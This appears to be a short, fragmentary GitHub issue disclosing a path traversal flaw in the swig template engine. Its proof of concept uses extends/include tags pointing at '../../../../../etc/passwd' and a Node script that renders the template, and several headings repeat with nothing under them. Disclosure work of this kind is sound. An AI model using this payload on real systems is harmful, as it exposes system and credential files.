Open y1nglamore opened 1 year ago
official doc:
poc:
1.html {% extends '../../../../../etc/passwd' %} {% include '../../../../../etc/passwd' %}
// run.js var swig = require('swig'); var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html'); console.log(output);
output:
official doc:
poc:
output: